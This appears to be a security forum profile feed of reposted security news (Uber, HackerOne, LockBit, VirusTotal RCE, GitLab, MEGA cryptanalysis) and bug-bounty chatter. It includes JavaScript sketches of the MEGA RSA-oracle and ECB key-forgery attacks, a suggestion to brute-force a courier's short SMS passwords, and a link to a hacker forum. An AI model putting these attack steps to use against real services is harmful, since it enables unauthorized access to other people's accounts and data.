akkiliON

Active Members
  • Posts: 1147
  • Joined
  • Last visited
  • Days Won: 26

akkiliON last won the day on October 3

akkiliON had the most liked content!

Reputation

581 Excellent

2 Followers

About akkiliON

  • Rank: Retired Contributor
  • Birthday 01/01/1970

Recent Profile Visitors

5699 profile views
  1. The vulnerability in [*].live.com. I got a message today. I wasn't expecting a reply this quickly. 🙂 Later edit: They've even fixed it already... LOL. I just checked 😅
  2. I'll post an update here when I get any news.... It will definitely take some time.... Thanks! I found that one too and wanted to report it, at least for the Hall of Fame. If you found it as well and they told you it's out of scope.... there's no point anymore.... 😅 Hey nO_Ob, who told you to sit around... get to work 😂
  3. Hi. I found two XSS vulnerabilities in applications owned by Microsoft. One is in Outlook, and the second is in another well-known application used by many... I can't share details at the moment because neither of them has been fixed yet... At least, I haven't had the reports I submitted marked as duplicates. 🙂 1. Reflected XSS (without user interaction) - [*].live.com: 2. Reflected XSS (user interaction required) - Outlook: I also noticed that these domains are vulnerable: office365.com and live.com.
  4. Ride-hailing giant Uber disclosed Thursday that it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities. The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter.

The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that were supposed to have been compromised. "It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said.

Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be 18 years old, social-engineered the employee to get hold of their password by masquerading as a corporate IT person, and used it to obtain a foothold into the internal network. "Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News.

This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and for ultimately paying the hackers $100,000 to hide the breach; it became public knowledge only in late 2017. Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations.

In December 2021, Sullivan was handed an additional three counts of wire fraud on top of the previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach."

The latest breach also comes as the criminal case against Sullivan goes to trial in the U.S. District Court in San Francisco. "The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access."

Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
  5. Company says it is making changes to its security controls to prevent malicious insiders from doing the same thing in future; reassures bug hunters their bounties are safe.

HackerOne has fired one of its employees for collecting bug bounties from its customers after alerting them to vulnerabilities in their products — bugs that had been found by other researchers and disclosed privately to HackerOne via its coordinated vulnerability disclosure program.

HackerOne discovered the caper when one of its customers asked the organization to investigate a vulnerability disclosure that was made outside the HackerOne platform in June. The customer, like other clients of bug bounty programs, uses HackerOne to collect and report vulnerabilities in its products that independent security researchers might have discovered. In return, the company pays a reward — or bug bounty — for reported vulnerabilities.

In this instance, the HackerOne customer said an anonymous individual had contacted them about a vulnerability that was very similar to another bug in its technology that a researcher had previously submitted via the HackerOne platform. Bug collisions — where two or more researchers might independently unearth the same vulnerability — are not uncommon. "However, this customer expressed skepticism that this was a genuine collision and provided detailed reasoning," HackerOne said in a report summarizing the incident. The customer described the individual — who used the handle "rzlr" — as using intimidating language in communicating information about the vulnerability, HackerOne said.

Malicious Insider

The company's investigation of the June 22, 2022, tip almost immediately pointed to multiple customers likely being contacted in the same manner. HackerOne researchers began probing every scenario where someone might have gained access to its vulnerability disclosure data: whether someone might have compromised one of its systems, gained remote access some other way, or if the disclosure had resulted from a misconfiguration. The data quickly pointed to the threat actor being an insider with access to the vulnerability data.

HackerOne's investigators then looked at their log data on employee access to vulnerability disclosures and found that just one employee had accessed each of the disclosures that customers reported as being suspicious. "Within 24 hours of the tip from our customer, we took steps to terminate that employee's system access and remotely locked their laptop pending further investigation," HackerOne said.

The company found the former employee had created a fictitious HackerOne account and collected bounties for a handful of disclosures. HackerOne worked with the relevant payment providers in each instance to confirm the bounties were paid into a bank account connected with the now-former employee. By analyzing the individual's network traffic, the investigators were also able to link the fictitious account to the ex-employee's primary HackerOne account.

Undermining Trust

Mike Parkin, senior technical engineer at Vulcan Cyber, says incidents like this can undermine the trust that is key to the success of crowdsourced vulnerability disclosure programs such as the one that HackerOne manages. "Trust is a big factor in vulnerability research and can play a large part in many bug bounty programs," Parkin says. "So, when someone effectively steals another researcher's work and presents it as their own, that foundational trust can be stretched."
Parkin praised HackerOne for being transparent and acting quickly to address the situation. "Hopefully this incident won't affect the vulnerability research ecosystem overall, but it may lead to deeper reviews of bug bounty submissions going forward," he says.

HackerOne said the former employee — who started only on April 4 — directly communicated with a total of seven of its customers. It urged any other customers that might have been contacted by an individual using the handle rzlr to contact the company immediately, especially if the communication had been aggressive or threatening in tone.

The company also reassured hackers who have signed up for the platform that their eligibility for any bounties they might receive for vulnerability disclosures had not been adversely impacted. "All disclosures made from the threat actor were considered duplicates. Bounties applied to these submissions did not impact the original submissions." HackerOne said it would contact hackers whose reports the ex-employee might have accessed and attempted to resubmit. "Since the founding of HackerOne, we have honored our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer Internet," the company said.

Following the incident, HackerOne has identified several areas where it plans to bolster controls. These include improvements to its logging capabilities, adding employees to monitor for insider threats, enhancing its employee screening practices during the hiring process, and controls for isolating data to limit damage from incidents of this type.

Jonathan Knudsen, head of global research at Synopsys Cybersecurity Research Center, says HackerOne's decision to communicate clearly about the incident and its response to it is an example of how organizations can limit damage. "Security incidents are often viewed as embarrassing and irredeemable," he says. But being completely transparent about what happened can increase credibility and garner respect from customers. "HackerOne has taken an insider threat incident and responded in a way that reassures customers that they take security very seriously, are capable of responding quickly and effectively, and are continuously examining and improving their processes," Knudsen says.

Source: https://www.darkreading.com/vulnerabilities-threats/hackerone-employee-fired-for-stealing-and-selling-bug-reports-for-personal-gain
  6. The LockBit 3.0 ransomware operation was launched recently, and it includes a bug bounty program offering up to $1 million for vulnerabilities and various other types of information.

LockBit has been around since 2019, and the LockBit 2.0 ransomware-as-a-service operation emerged in June 2021. It has been one of the most active ransomware operations, accounting for nearly half of all ransomware attacks in 2022, with more than 800 victims named on the LockBit 2.0 leak website. The cybercriminals encrypt files on compromised systems and also steal potentially valuable information that they threaten to make public if the victim refuses to pay up.

With the launch of LockBit 3.0, it seems they are reinvesting some of the profit in their own security via a "bug bounty program". Similar to how legitimate companies reward researchers to help them improve their security, LockBit operators claim they are prepared to pay out between $1,000 and $1 million to security researchers and ethical or unethical hackers. Rewards can be earned for website vulnerabilities, flaws in the ransomware encryption process, vulnerabilities in the Tox messaging app, and vulnerabilities exposing their Tor infrastructure. They are also prepared to reward "brilliant ideas" on how to improve their site and software, as well as information on competitors. Addressing these types of security holes can help protect the cybercrime operation against researchers and law enforcement.

One million dollars is offered to anyone who can dox — find the real identity of — a LockBit manager known as "LockBitSupp", who is described as the "affiliate program boss". This bounty has been offered since at least March 2022. Major ransomware groups are believed to have made hundreds of millions and even billions of dollars, which means the LockBit group could have the funds needed for such a bug bounty program.

"With the fall of the Conti ransomware group, LockBit has positioned itself as the top ransomware group operating today based on its volume of attacks in recent months. The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top," commented Satnam Narang, senior staff research engineer at Tenable.

However, John Bambenek, principal threat hunter at security and operations analytics SaaS company Netenrich, said he doubts the bug bounty program will get many takers. "I know that if I find a vulnerability, I'm using it to put them in prison. If a criminal finds one, it'll be to steal from them because there is no honor among ransomware operators," Bambenek said.

Casey Ellis, founder and CTO of bug bounty platform Bugcrowd, noted that "the same way hackers aren't always 'bad', the bounty model isn't necessarily 'only useful for good'." Ellis also pointed out, "Since Lockbit 3.0's bug bounty program essentially invites people to add a felony in exchange for a reward, they may end up finding that the $1,000 low reward is a little light given the risks involved for those who might decide to help them."

Other new features introduced with the launch of LockBit 3.0 include allowing victims to buy more time or "destroy all information". The cybercriminals are also offering anyone the option to download all files stolen from a victim. Each of these options has a certain price. Vx-underground, a service that provides malware samples and other resources, also noted that harassment of victims is now encouraged as well.
South Korean cybersecurity firm AhnLab reported last week that the LockBit ransomware has been distributed via malicious emails claiming to deliver copyright claims. “Lures like this one are simple and effective, although certainly not unique,” said Erich Kron, security awareness advocate at KnowBe4. “Like so many other phishing attacks, this is using our emotions, specifically the fear of a copyright violation, which many people have heard can be very costly, to get a person to make a knee-jerk reaction.” Source: https://www.securityweek.com/lockbit-30-ransomware-emerges-bug-bounty-program
  7. MEGA is a leading cloud storage platform with more than 250 million users and 1000 Petabytes of stored data, which aims to achieve user-controlled end-to-end encryption. We show that MEGA's system does not protect its users against a malicious server and present five distinct attacks, which together allow for a full compromise of the confidentiality of user files. Additionally, the integrity of user data is damaged to the extent that an attacker can insert malicious files of their choice which pass all authenticity checks of the client. We built proof-of-concept versions of all the attacks, showcasing their practicality and exploitability.

Background

MEGA is a cloud storage and collaboration platform founded in 2013, offering secure storage and communication services. With over 250 million registered users, 10 million daily active users and 1000 PB of stored data, MEGA is a significant player in the consumer domain. What sets them apart from competitors such as Dropbox, Google Drive, iCloud and Microsoft OneDrive is the claimed security guarantees: MEGA advertise themselves as "the privacy company" and promise User-Controlled end-to-end Encryption (UCE). We challenge these security claims and show that an adversarial service provider, or anyone controlling MEGA's core infrastructure, can break the confidentiality and integrity of user data.

Key Hierarchy

At the root of a MEGA client's key hierarchy, illustrated in the figure below, is the password chosen by the user. From this password, the MEGA client derives an authentication key and an encryption key. The authentication key is used to identify users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. For every account, this key material includes a set of asymmetric keys consisting of an RSA key pair (for sharing data with other users), a Curve25519 key pair (for exchanging chat keys for MEGA's chat functionality), and an Ed25519 key pair (for signing the other keys). Furthermore, for every file or folder uploaded by the user, a new symmetric encryption key called a node key is generated. The private asymmetric keys and the node keys are encrypted by the client with the master key using AES-ECB and stored on MEGA's servers to support access from multiple devices. A user on a new device can enter their password, authenticate to MEGA, fetch the encrypted key material, and decrypt it with the encryption key derived from the password.

Attacks

• RSA Key Recovery Attack: MEGA can recover a user's RSA private key by maliciously tampering with 512 login attempts.
• Plaintext Recovery: MEGA can decrypt other key material, such as node keys, and use them to decrypt all user communication and files.
• Framing Attack: MEGA can insert arbitrary files into the user's file storage which are indistinguishable from genuinely uploaded ones.
• Integrity Attack: The impact of this attack is the same as that of the framing attack, trading off less stealthiness for easier prerequisites.
• GaP-Bleichenbacher Attack: MEGA can decrypt RSA ciphertexts using an expensive padding oracle attack.

RSA Key Recovery Attack

MEGA uses RSA encryption for sharing node keys between users, to exchange a session ID with the user at login, and in a legacy key transfer for the MEGA chat. Each user has a public RSA key pk_share used by other users or MEGA to encrypt data for the owner, and a private key sk_share used by the user themselves to decrypt data shared with them.
The private RSA key is stored for the user in encrypted form on MEGA's servers. Key recovery means that an attacker successfully gets possession of the private key of a user, allowing them to decrypt ciphertexts intended for the user. We discovered a practical attack to recover a user's RSA private key by exploiting the lack of integrity protection of the encrypted keys stored for users on MEGA's servers. An entity controlling MEGA's core infrastructure can tamper with the encrypted RSA private key and deceive the client into leaking information about one of the prime factors of the RSA modulus during the session ID exchange. More specifically, the session ID that the client decrypts with the mauled private key and sends to the server will reveal whether the prime is smaller or greater than an adversarially chosen value. This information enables a binary search for the prime factor, with one comparison per client login attempt, allowing the adversary to recover the private RSA key after 1023 client logins. Using lattice cryptanalysis, the number of login attempts required for the attack can be reduced to 512.

Proof of Concept Attack

Since the server code is not published, we cannot implement a Proof-of-Concept (PoC) in which the adversary actually controls MEGA. Instead, we implemented a MitM attack by installing a bogus TLS root certificate on the victim. This setup allows the attacker to impersonate MEGA towards the user while using the real servers to execute the server code (which is unknown to us). Server responses can be patched on the fly since they do not rely on secrets stored by the server, allowing the attack to be performed in real time as the victim interacts with MEGA. The following video shows how our attack recovers the first byte of the RSA private key. Afterward, we abort the attack to avoid any adverse impact on MEGA's production servers. For each recovered bit, the attack consists of the following steps:

1. The victim logs in.
2. The adversary hijacks the login and replaces the correct session ID with their probe for the next secret bit.
3. Based on the client's response, the adversary updates its interval for the binary search of the RSA prime factor.
4. The login fails for the victim. (This is only a limitation of the MitM setup, since the correct SID is lost; an adversarial cloud storage provider can simply accept the returned SID.)

Note that after aborting the attack, the search interval is [0xe03ff...f, 0xe07ff...f]. The secret prime factor q of the RSA modulus starts with 0xe06.... This value is within the search interval, and the adversary has already recovered the first byte, 0xe0. Using all of q, the adversary can recover the RSA private key (d, N) using the public key (e, N), as p = N/q and d = e^-1 mod (p-1)(q-1).

Video: https://mega-awry.io/videos/rsa_key_recovery_poc.mp4

Plaintext Recovery

As shown in the key hierarchy, MEGA clients encrypt the private keys for sharing, chat key transfer, and signing with the master key using AES-ECB. Furthermore, file and folder keys use the same encryption. A plaintext recovery attack lets the adversary compute the plaintext from a given ciphertext. In this specific attack, MEGA can decrypt AES-ECB ciphertexts created with a user's master key. This gives the attacker access to the aforementioned and highly sensitive key material encrypted in this way. With the sharing, chat, signing, and node keys of a user, the adversary can decrypt the victim's data or impersonate them.
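To make the binary search from the RSA key recovery attack concrete, here is a minimal JavaScript sketch. It assumes a boolean oracle primeGreaterThan(guess) that wraps one tampered login and reports what the returned SID reveals; the oracle's name and interface are illustrative only, not MEGA's or the paper's code:

async function recoverPrime(primeGreaterThan) {
  // q is one of the two 1024-bit prime factors of the 2048-bit modulus N.
  let lo = 1n << 1023n;                 // smallest 1024-bit value
  let hi = (1n << 1024n) - 1n;          // largest 1024-bit value
  while (lo < hi) {                     // ~1023 iterations = ~1023 logins
    const mid = (lo + hi) / 2n;
    if (await primeGreaterThan(mid)) {
      lo = mid + 1n;                    // q > mid
    } else {
      hi = mid;                         // q <= mid
    }
  }
  return lo; // = q; then p = N / q and d = e^-1 mod (p-1)(q-1)
}

(The lattice cryptanalysis mentioned above reduces the login count by letting the attacker stop the search after recovering roughly half of q's bits.)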
The plaintext recovery attack exploits the lack of key separation for the master key and knowledge of the recovered RSA private key (e.g., from the RSA key recovery attack). The decryption oracle again arises during authentication, when the encrypted RSA private key and the session ID (SID), encrypted with the RSA public key, are sent from MEGA's servers to the user. MEGA can overwrite part of the RSA private key ciphertext in the SID exchange with two target ciphertext blocks. It then uses the SID returned by the client to recover the plaintext for the two target blocks. Since all key material is protected with AES-ECB under the master key, an attacker exploiting this vulnerability can decrypt node keys, the victim's Ed25519 signature key, its Curve25519 chat key, and, thus, also all exchanged chat keys. Given that the private RSA key has been recovered, one client login suffices to recover 32 bytes of encrypted key material, corresponding, for instance, to one full node key.

Framing Attack

This attack allows MEGA to forge data in the name of the victim and place it in the target's cloud storage. While the previous attacks already allow an adversary to modify existing files using the compromised keys, this attack allows the adversary to preserve existing files or add more documents than the user currently stores. For instance, a conceivable attack might frame someone as a whistle-blower and place an extensive collection of internal documents in the victim's cloud storage. Such an attack might gain credibility when it preserves the user's original cloud content.

To create a new file key, the attacker makes use of the particular format that MEGA uses for node keys. Before they are encrypted, node keys are encoded into a so-called obfuscated key object, which consists of a reversible combination of the node key and information used for decryption of the file or folder (specifically, a nonce and a truncated MAC tag). Since none of our attacks allow an attacker to encrypt values of their choosing with AES-ECB under the master key, the attacker works in the reverse direction to create a new valid obfuscated key object. That is, it first obtains an obfuscated key by decrypting a randomly sampled key ciphertext using the plaintext recovery attack. Note that this ciphertext can really be randomly sampled from the set of all bit strings of the length of one encrypted obfuscated key object. Decryption will always succeed, since the AES-ECB encryption mode used to encrypt key material does not provide any means of checking the integrity of a ciphertext. The resulting string is not under the control of the adversary and will be random-looking, but can regardless be used as a valid obfuscated key object, since both file keys and the integrity information (nonces and MAC tags) can be arbitrary strings. Hence, the adversary parses the decrypted string into a file key, a nonce and a MAC tag. It then modifies the target file which is to be inserted into the victim's cloud such that it passes the integrity check when the file key and integrity information from the obfuscated key are used. The attacker achieves this by inserting a single AES block in the file at a chosen location. Finally, the adversary uses the known file key to encrypt the file and uploads the result to the victim's cloud. Many standard file formats such as PNG and PDF tolerate 128 injected bits (for instance, in the file's metadata, as trailing data, or in unused structural components) without affecting the displayed content.
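As a rough JavaScript sketch of this reverse direction (Node's crypto module; the 16-byte master key and the XOR-style 32-byte obfuscated-key layout are illustrative assumptions based on the description above, not MEGA's exact encoding):

const crypto = require('crypto');

// Stand-in for the user's 128-bit master key, recovered via the attacks above.
const masterKey = crypto.randomBytes(16);

// Step 1: sample a random "ciphertext" the length of one encrypted obfuscated
// key object. ECB decryption has no integrity check, so this always succeeds
// and yields a random-looking but perfectly usable key object.
const randomCiphertext = crypto.randomBytes(32);
const decipher = crypto.createDecipheriv('aes-128-ecb', masterKey, null);
decipher.setAutoPadding(false); // key material is block-aligned, no padding
const obf = Buffer.concat([decipher.update(randomCiphertext), decipher.final()]);

// Step 2: parse it into file key + integrity data; any bytes are "valid".
const fileKey = Buffer.alloc(16);
for (let i = 0; i < 16; i++) fileKey[i] = obf[i] ^ obf[i + 16]; // assumed layout
const nonce = obf.subarray(16, 24);
const metaMac = obf.subarray(24, 32);

// Step 3 (not shown): insert one chosen AES block into the target file so its
// MAC under fileKey/nonce equals metaMac, encrypt with fileKey, and upload.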
The image above shows the file our proof of concept inserts in the victim account. Our attack added the highlighted bytes to satisfy the integrity check. Due to the structure of PNG files, these bytes do not change the displayed pixels, i.e., the file is visually identical to the unmodified image.

Proof-of-Concept Attack

The PoC shows our framing attack in the MitM setting described in the RSA private key recovery attack. The video shows the following steps:

1. The victim logs into their account without any attack running. There are only three files in the cloud storage, and none of them is called hacker-cat.png.
2. The victim logs out, and the adversary runs the plaintext recovery attack once. This involves the following steps: the adversary hijacks the victim's login attempt and replaces the encrypted SID with the encrypted key that it picked for the file forgery; the victim's client responds with the decrypted SID, from which the adversary can recover the plaintext for the injected ciphertext blocks. The login attempt fails, which is only a limitation of the MitM setting: a malicious cloud provider can perform this attack without the user noticing.
3. The adversary uses the key recovered in the previous step to forge an encrypted file.
4. The victim logs in again. The adversary injects the forged file into the loaded file tree.
5. The victim's cloud now displays four files, including a new file called hacker-cat.png. When the user views this file in the browser, it correctly decrypts and shows the image.

Video: https://mega-awry.io/videos/framing_attack_poc.mp4

Integrity Attack

This attack exploits the peculiar structure of MEGA's obfuscated key objects to manipulate an encrypted node key such that the decrypted key consists of all zero bytes. Since the attacker now knows the key, this key manipulation can be used to forge a file in a manner similar to the framing attack. Unlike the framing attack (which requires the ability to decrypt arbitrary AES-ECB ciphertexts), this attack only needs access to a single plaintext block and the corresponding ciphertext encrypted with AES-ECB under the master key.

For instance, the attacker can use MEGA's protocol for public file sharing to obtain such a pair: when a user shares a file or folder publicly, they create a link containing the obfuscated key in plaintext. Hence, a malicious cloud provider who obtains such a link knows both the plaintext and the corresponding ciphertext for the node key, since the latter was uploaded to MEGA when the file was created (before being shared). This can then be used as the starting point for the key manipulation, and it allows a forged file ciphertext to be uploaded into the victim's cloud, just as in the framing attack. However, this attack is less surreptitious than the framing attack because of the low probability of the all-zero key appearing in an honest execution, meaning that an observant user who inspects the file keys stored in their account could notice that the attack has been performed.

GaP-Bleichenbacher Attack

This attack is a novel variant of Bleichenbacher's attack on PKCS#1 v1.5 padding. We call it a Guess-and-Purge (GaP) Bleichenbacher attack. MEGA can use this attack to decrypt RSA ciphertexts by exploiting a padding oracle in the fallback chat key exchange of MEGA's chat functionality. The vulnerable RSA encryption is used for sharing node keys between users, to exchange a session ID with the user at login, and in a legacy key transfer for the MEGA chat.
As shown in the key hierarchy, each user has a public RSA key used by other users or MEGA to encrypt data for the owner, and a private key used by the user themselves to decrypt data shared with them. With this attack, MEGA can decrypt these RSA ciphertexts, albeit requiring an impractical number of login attempts.

Attack idea: The original Bleichenbacher attack maintains an interval for the possible plaintext value of a target ciphertext. It exploits the malleability of RSA to test the decryption of multiples of the unknown target message. Successful unpadding leaks the prefix of the decrypted message due to the structure of the PKCS#1 v1.5 padding. This prefix allows an adversary to reduce intervals efficiently and recover the plaintext. MEGA uses a custom padding scheme which is less rigid than PKCS#1 v1.5. This makes it challenging to apply Bleichenbacher's attack, because a successful unpadding no longer corresponds to a single solution interval; instead, many disjoint intervals are possible, depending on the value of an unknown prefix in MEGA's padding scheme. Our attack devises a new Guess-and-Purge strategy that guesses the unknown prefix and quickly purges wrong guesses. This enables us to perform a search for the decryption of a ciphertext in 2^16.9 client login attempts on average.

Although this attack is weaker than the RSA key recovery attack (in the sense that a key recovery implies plaintext recovery), it is complementary in the vulnerabilities that it exploits and requires different attacker capabilities. It attacks the legacy chat key decryption of RSA encryption instead of the session ID exchange, and it can be performed by a slightly weaker adversary, since no key-overwriting is necessary. The details of the GaP-Bleichenbacher attack are intricate; for a full description, see Appendix B of the paper.

Sources:
https://mega-awry.io/
https://thehackernews.com/2022/06/researchers-uncover-ways-to-break.html
https://blog.mega.io/mega-security-update/
  8. Despite the old saying, not everything lives forever on the internet — including stolen crypto. This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED.

"Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED," BlockSec said on Twitter this week. The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used. "Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited," BlockSec said in a following tweet.

Possible Vigilante

The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it's possible the hacker did this on purpose. BlockSec isn't sure what the motive was and suggests it could've been an accident. A report by VICE published this week says the hacker could've been a vigilante with a message or something to prove. Because the self-destruct feature "burned" the tokens, they're essentially gone forever. VICE suggests the hacker could've wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After the hacked tokens were sold, YEED's value crashed to near zero. Sales won't resume until ZEED takes steps to secure, repair and test its systems.

Maybe the hacker messed up, or maybe we just witnessed a modern-day Robin Hood attack. It's possible we'll never know who pulled off the hack, or why.

Source: https://futurism.com/the-byte/hacker-steals-destroys

Dorel, what have you done..... 😂
  9. A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet. "By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets."

Ever Surf is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an estimated 669,700 accounts across the world.

By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encrypted keys and seed phrases that are stored in the browser's local storage, which can then be trivially brute-forced to siphon funds. Given that the information in the local storage is unencrypted, it could be accessed by rogue browser add-ons or information-stealing malware that's capable of harvesting such data from different web browsers.

Following responsible disclosure, a new desktop app has been released to replace the vulnerable web version, with the latter now marked as deprecated and used only for development purposes. "Having the keys means full control over the victim's wallet, and, therefore funds," Check Point's Alexander Chailytko said. "When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, keep OS and anti-virus software updated."

"Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, [and] phishing."

Source: https://thehackernews.com/2022/04/critical-bug-in-everscale-wallet.html
  10. After deep security research by the Cysource research team, led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within the VirusTotal platform and gain access to its various scan capabilities.

About VirusTotal:

The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use CVE-2021-22204 so that these scanners would execute the payload as soon as exiftool was run.

Technical part:

The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload:

Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works, virustotal.com uses several scanners. The application sent our file with the payload to several hosts to perform the scan. On VirusTotal's hosts, at the moment exiftool is executed, as described in CVE-2021-22204, instead of parsing the file's metadata it executes our payload, handing us a reverse shell on our machine.

After that we noticed that it's not just a Google-controlled environment, but also environments related to internal scanners and partners that assist in the VirusTotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges.

Hosts identified within the internal network:

The interesting part is that every time we uploaded a file with a new hash containing a new payload, VirusTotal forwarded the payload to other hosts. So not only did we have an RCE, it was also forwarded by Google's servers to Google's internal network, its customers and partners. Various types of services were found within the networks, such as MySQL, Kubernetes, Oracle databases, HTTP and HTTPS applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as Kubernetes tokens and certificates, service configuration info, source code, logs, etc.

We reported all the findings to Google, which fixed the issue quickly.

Disclosure Process:

Report received by GoogleVRP - 04.30.2021
GoogleVRP triaged the report - 05.19.2021
GoogleVRP accepted the report as a valid report - 21.05.2021
GoogleVRP closed the report - 04.06.2021
Virustotal was no longer vulnerable - 13.01.2022
GoogleVRP allowed publishing - 15.01.2022

Source: https://www.cysrc.com/blog/virus-total-blog
  11. Hackers: https://breached.co/index.php
  12. Gls.ro IDOR

Send them an e-mail if you want and see what they tell you. I think you can send them a message here: https://gls-group.eu/GROUP/en/gls_informs/safety_advice_1606mmeaxqozb E-mail: security@gls-group.eu

From what I remember, I reported a vulnerability to Canon a few years ago and they fixed the issue... I never got any reply from them, not even a thank you. 🙃 Funnily enough, I have a parcel arriving from them today 😅.... As @SirGod said, the password is 4 characters.... that's what I noticed in the SMS I received too..... See if a brute-force attack works.... I haven't tested it.

EDIT: Actually, the password I received is 5 characters long.... my bad. 😄
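For what it's worth, the keyspace is tiny either way. A quick back-of-the-envelope sketch (assuming digits only, which the SMS codes suggest but the post doesn't confirm):

// hypothetical estimate, not GLS's actual scheme
const alphabet = 10;                 // assumption: digits only
console.log(alphabet ** 4);          // 10000 candidates for 4 characters
console.log(alphabet ** 5);          // 100000 candidates for 5 characters
// even at a throttled 10 guesses/second, 10^5 codes fall in ~3 hours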
  13. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks.

Tracked as CVE-2021-22205, the issue relates to improper validation of user-provided images, which results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, was addressed by GitLab on April 14, 2021, in versions 13.8.8, 13.9.6, and 13.10.3.

In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions.

Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021, owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday.

Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet-facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here.

Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
  14. Everyone knows what's inside a computer isn't really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn't. In the real world, everything has a certain mooring we're all attuned to. You put money in a big strong safe, and, most likely, if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they're expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they'd dance, but that's not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense.

The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It's easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you're careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that's why I've always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole.

Before the pandemic, I spent a lot of time researching the way the web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the 'Desktop Application', the consequences of which I summarised one sunny day in Miami. I'm not really a very good security researcher, so little of my work sees the light of day because the words don't always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I'll tell you about now. But I can't tell you about those.

Perhaps naïvely, it didn't occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn't have any formal way of paying you for bugs: you just emailed them and hoped for the best. Maybe you'd get something, maybe you wouldn't — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me.

